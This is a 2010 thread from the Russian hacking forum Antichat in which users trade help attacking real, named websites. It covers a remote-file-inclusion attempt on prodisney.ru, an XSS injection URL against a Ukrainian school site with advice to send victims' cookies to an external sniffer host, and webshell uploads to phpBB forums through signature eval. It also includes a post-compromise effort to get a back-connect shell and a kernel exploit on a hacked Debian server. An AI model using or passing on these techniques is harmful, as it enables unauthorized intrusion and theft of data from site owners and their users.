Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

08.04.2010, 12:57
|
|
Новичок
Регистрация: 07.04.2010
Сообщений: 2
Провел на форуме: 3608
Репутация:
0
|
|
http://www.prodisney.ru/index.php?page=GPI
все вроде отлично, но не пойму одного: почему при ссылке на мой шелл с народа браузер предлагает скачать shell.php?
пробовал менять расширение шелла на txt, теперь на старницу выводиться тект шелла(необработанный пхп)
|
|
|

08.04.2010, 13:21
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме: 472147
Репутация:
211
|
|
Сообщение от melky
http://www.prodisney.ru/index.php?page=GPI
все вроде отлично, но не пойму одного: почему при ссылке на мой шелл с народа браузер предлагает скачать shell.php?
пробовал менять расширение шелла на txt, теперь на старницу выводиться тект шелла(необработанный пхп)
здесь нету RFI
|
|
|

08.04.2010, 13:40
|
|
Новичок
Регистрация: 07.04.2010
Сообщений: 2
Провел на форуме: 3608
Репутация:
0
|
|
Сообщение от 547
здесь нету RFI
http://www.prodisney.ru/index.php?page=http://google.ru/index.php
|
|
|

08.04.2010, 13:47
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
Там фреймы
|
|
|

08.04.2010, 16:10
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
не канает метод шанкара... остальные тожe,
когда аватарку загружаю выдает вот это
Unable to upload file
DEBUG MODE
Line : 251
File : usercp_avatar.php
Что посоветуете?
|
|
|

08.04.2010, 19:18
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме: 399
Репутация:
0
|
|
помогите! на сайте http://school145.edu.kh.ua/ есть пассивная xss как стырить куки?
|
|
|

08.04.2010, 19:25
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Сообщение от Gorev
не канает метод шанкара... остальные тожe,
когда аватарку загружаю выдает вот это
Unable to upload file
DEBUG MODE
Line : 251
File : usercp_avatar.php
Что посоветуете?
а какие остальные? В подпись eval пробовал совать? Есть вопросы - PM
PS: решено)
Последний раз редактировалось Pashkela; 08.04.2010 в 19:43..
|
|
|

08.04.2010, 19:27
|
|
Участник форума
Регистрация: 30.09.2009
Сообщений: 148
Провел на форуме: 11581319
Репутация:
241
|
|
Сообщение от -oleg-
помогите! на сайте http://school145.edu.kh.ua/ есть пассивная xss как стырить куки?
http://school145.edu.kh.ua/livesearch/search/query/?value="><script>alert()</script>
вместо "><script>alert()</script> скрипт сниффера(например sniffer.xaknet.ru)
|
|
|

08.04.2010, 21:01
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Ну что же друзья, может это будет и оффтоп , но решилась не одна проблема по заливке шелла на форум пхпбб, много форумов у которых не срабатывал ни один общеизветсный способ заливки кода ,сегодня стали достоянием моего списка с шеллами. И все благодаря способу который Pashkela описал тут link .Всем рекомендую.
|
|
|

08.04.2010, 21:34
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме: 472147
Репутация:
211
|
|
вообщем такая проблемка,есть linux (debian) 2.6.18. залил шелл wso2,биндпорт,бэкконнект
не проходит... при вводе which gcc ничего не показует, хотя на вкладке шелла [sec. info] явно показует (gcc version 4.1.2 20061115 (prerelease)... как быть дальше? может попробовать скомпилированый сплоит под это ядро? вот только где взять компилированый? wget присутствует...
P.S. Я так понимаю что если выход в инет осуществляется через VPN сервер то бэкконект и биндпорт непроканает?...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|